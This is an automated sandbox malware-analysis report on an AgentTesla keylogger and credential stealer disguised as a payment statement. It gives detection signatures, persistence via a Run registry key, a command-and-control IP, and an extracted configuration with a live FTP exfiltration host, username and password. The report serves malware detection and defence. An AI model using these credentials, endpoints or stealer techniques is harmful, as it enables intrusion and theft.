Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Statement of Account - USD 16,720.00.exe

Overview

General Information

Sample name:Statement of Account - USD 16,720.00.exe
Analysis ID:1582790
MD5:cf173ca1db13dfc7237fd33630926b65
SHA1:783e42e20da75ea1a2fd7a02e3824f251f26cf4f
SHA256:1b9d152c5cd6e2904ada0ca707dbd2bb089ac59f8b07723490552a000848cc54
Tags:agentteslaexeuser-juroots
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
.NET source code contains potential unpacker
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Drops executable to a common third party application directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • adobe.exe (PID: 1532 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: CF173CA1DB13DFC7237FD33630926B65)
    • adobe.exe (PID: 1868 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: CF173CA1DB13DFC7237FD33630926B65)
    • adobe.exe (PID: 7116 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: CF173CA1DB13DFC7237FD33630926B65)
  • adobe.exe (PID: 5560 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: CF173CA1DB13DFC7237FD33630926B65)
    • adobe.exe (PID: 6292 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: CF173CA1DB13DFC7237FD33630926B65)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://s4.serv00.com", "Username": "f2241_evico", "Password": "Doll650#@"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000006.00000002.2241640405.0000000002CCC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000009.00000002.4487080897.00000000028E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000009.00000002.4487080897.00000000028E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000006.00000002.2237605469.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000006.00000002.2237605469.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 16 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x32156:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x321c8:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x32252:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x322e4:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x3234e:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x323c0:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x32456:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x324e6:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                  • 0x2f439:$s2: GetPrivateProfileString
                  • 0x2eb44:$s3: get_OSFullName
                  • 0x3016e:$s5: remove_Key
                  • 0x30313:$s5: remove_Key
                  • 0x31272:$s6: FtpWebRequest
                  • 0x32138:$s7: logins
                  • 0x326aa:$s7: logins
                  • 0x353bb:$s7: logins
                  • 0x3546d:$s7: logins
                  • 0x36dbe:$s7: logins
                  • 0x36007:$s9: 1.85 (Hash, version 2, native byte-order)
                  6.2.adobe.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 15 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\adobe\adobe.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe, ProcessId: 1288, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\adobe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-31T14:01:58.492073+010020299271A Network Trojan was detected192.168.2.549707213.189.52.18121TCP
                    2024-12-31T14:02:12.444136+010020299271A Network Trojan was detected192.168.2.549713213.189.52.18121TCP
                    2024-12-31T14:02:20.618400+010020299271A Network Trojan was detected192.168.2.549745213.189.52.18121TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-31T14:01:59.039543+010028555421A Network Trojan was detected192.168.2.549709213.189.52.18163775TCP
                    2024-12-31T14:01:59.044751+010028555421A Network Trojan was detected192.168.2.549709213.189.52.18163775TCP
                    2024-12-31T14:02:13.007555+010028555421A Network Trojan was detected192.168.2.549718213.189.52.18163475TCP
                    2024-12-31T14:02:13.012652+010028555421A Network Trojan was detected192.168.2.549718213.189.52.18163475TCP
                    2024-12-31T14:02:21.179731+010028555421A Network Trojan was detected192.168.2.549756213.189.52.18163292TCP
                    2024-12-31T14:02:21.188362+010028555421A Network Trojan was detected192.168.2.549756213.189.52.18163292TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-31T14:03:30.360786+010018000071A Network Trojan was detected192.168.2.549990213.189.52.18164485TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-31T14:02:21.188362+010018000091A Network Trojan was detected192.168.2.549756213.189.52.18163292TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: Statement of Account - USD 16,720.00.exeAvira: detected
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeAvira: detection malicious, Label: HEUR/AGEN.1306767
                    Found malware configuration
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://s4.serv00.com", "Username": "f2241_evico", "Password": "Doll650#@"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeReversingLabs: Detection: 50%
                    Multi AV Scanner detection for submitted file
                    Source: Statement of Account - USD 16,720.00.exeVirustotal: Detection: 33%Perma Link
                    Source: Statement of Account - USD 16,720.00.exeReversingLabs: Detection: 50%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: Statement of Account - USD 16,720.00.exeJoe Sandbox ML: detected
                    Source: Statement of Account - USD 16,720.00.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49704 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49712 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49732 version: TLS 1.2
                    Source: Statement of Account - USD 16,720.00.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49718 -> 213.189.52.181:63475
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49709 -> 213.189.52.181:63775
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49713 -> 213.189.52.181:21
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49745 -> 213.189.52.181:21
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49707 -> 213.189.52.181:21
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49756 -> 213.189.52.181:63292
                    Source: Network trafficSuricata IDS: 1800009 - Severity 1 - Joe Security MALWARE AgentTesla - FTP Exfil Passwords : 192.168.2.5:49756 -> 213.189.52.181:63292
                    Source: Network trafficSuricata IDS: 1800007 - Severity 1 - Joe Security MALWARE AgentTesla - FTP Exfil Keyboard Logs : 192.168.2.5:49990 -> 213.189.52.181:64485
                    Connects to many ports of the same IP (likely port scanning)
                    Source: global trafficTCP traffic: 213.189.52.181 ports 64485,63475,63775,1,2,63292,21
                    Source: global trafficTCP traffic: 192.168.2.5:49709 -> 213.189.52.181:63775
                    Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                    Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                    Source: Joe Sandbox ViewIP Address: 213.189.52.181 213.189.52.181
                    Source: Joe Sandbox ViewASN Name: ECO-ATMAN-PLECO-ATMAN-PL ECO-ATMAN-PLECO-ATMAN-PL
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownFTP traffic detected: 213.189.52.181:21 -> 192.168.2.5:49707 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 14:01. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 14:01. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 14:01. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: s4.serv00.com
                    Source: Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.2241640405.0000000002CCC000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.4487080897.000000000290C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s4.serv00.com
                    Source: Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.2241640405.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.4487080897.000000000289C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Statement of Account - USD 16,720.00.exe, 00000000.00000002.2018623080.0000000004329000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.2237605469.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: Statement of Account - USD 16,720.00.exe, 00000000.00000002.2018623080.0000000004329000.00000004.00000800.00020000.00000000.sdmp, Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.2241640405.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.2237605469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.4487080897.000000000289C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.2241640405.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.4487080897.000000000289C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.2241640405.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.4487080897.000000000289C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49704 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49712 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49732 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.raw.unpack, SKTzxzsJw.cs.Net Code: yMwXHKL8p
                    Installs a global keyboard hook
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\adobe\adobe.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\adobe\adobe.exeJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 6.2.adobe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 6.2.adobe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.43ad5b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.43ad5b0.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.436b580.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.436b580.0.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeCode function: 0_2_0163DB1C0_2_0163DB1C
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeCode function: 1_2_00F0F2081_2_00F0F208
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeCode function: 1_2_00F0B3B01_2_00F0B3B0
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeCode function: 1_2_00F04A901_2_00F04A90
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeCode function: 1_2_00F0ABE01_2_00F0ABE0
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeCode function: 1_2_00F03E781_2_00F03E78
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeCode function: 1_2_00F041C01_2_00F041C0
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeCode function: 1_2_067537301_2_06753730
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeCode function: 1_2_06751D741_2_06751D74
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeCode function: 1_2_06752A681_2_06752A68
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeCode function: 1_2_06752A5B1_2_06752A5B
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeCode function: 1_2_06752A431_2_06752A43
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeCode function: 1_2_06752A201_2_06752A20
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeCode function: 1_2_067537531_2_06753753
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeCode function: 1_2_067B62381_2_067B6238
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeCode function: 1_2_067B23881_2_067B2388
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeCode function: 1_2_067B51E81_2_067B51E8
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeCode function: 1_2_067BC1D81_2_067BC1D8
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeCode function: 1_2_067B59301_2_067B5930
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeCode function: 1_2_067BA9101_2_067BA910
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeCode function: 1_2_067B79C81_2_067B79C8
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeCode function: 1_2_067BE4001_2_067BE400
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeCode function: 1_2_067B72E81_2_067B72E8
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeCode function: 1_2_067B00401_2_067B0040
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeCode function: 1_2_067B00071_2_067B0007
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_027325D84_2_027325D8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_0273DB1C4_2_0273DB1C
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_0125E0F86_2_0125E0F8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_0125E8A96_2_0125E8A9
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_01254A906_2_01254A90
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_01253E786_2_01253E78
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_012541C06_2_012541C0
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_0125ADA86_2_0125ADA8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_06A366386_2_06A36638
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_06A334A86_2_06A334A8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_06A355E86_2_06A355E8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_06A37DC86_2_06A37DC8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_06A3B26F6_2_06A3B26F
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_06A3C1D86_2_06A3C1D8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_06A376E86_2_06A376E8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_06A3E4006_2_06A3E400
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_06A35D1B6_2_06A35D1B
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_06A300406_2_06A30040
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_06B224636_2_06B22463
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_06B224686_2_06B22468
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_06A300076_2_06A30007
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_0288DB1C8_2_0288DB1C
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_00E0E0309_2_00E0E030
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_00E0E88A9_2_00E0E88A
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_00E04A909_2_00E04A90
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_00E0AD989_2_00E0AD98
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_00E03E789_2_00E03E78
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_00E041C09_2_00E041C0
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_067566389_2_06756638
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_067534A89_2_067534A8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_067555E89_2_067555E8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_06757DC89_2_06757DC8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_0675B26F9_2_0675B26F
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_0675C1D89_2_0675C1D8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_067576E89_2_067576E8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_067527289_2_06752728
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_0675E4009_2_0675E400
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_06755D1B9_2_06755D1B
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_067500409_2_06750040
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_068424639_2_06842463
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_068424689_2_06842468
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 9_2_067500079_2_06750007
                    Source: Statement of Account - USD 16,720.00.exe, 00000000.00000002.2018524292.0000000003321000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed9e9e37e-59b8-4cab-97db-2b15f3b5cf75.exe4 vs Statement of Account - USD 16,720.00.exe
                    Source: Statement of Account - USD 16,720.00.exe, 00000000.00000002.2017374336.000000000164E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Statement of Account - USD 16,720.00.exe
                    Source: Statement of Account - USD 16,720.00.exe, 00000000.00000000.2012111808.0000000000FEA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFixo.exe* vs Statement of Account - USD 16,720.00.exe
                    Source: Statement of Account - USD 16,720.00.exe, 00000000.00000002.2018623080.0000000004329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSoftwareGame.dll: vs Statement of Account - USD 16,720.00.exe
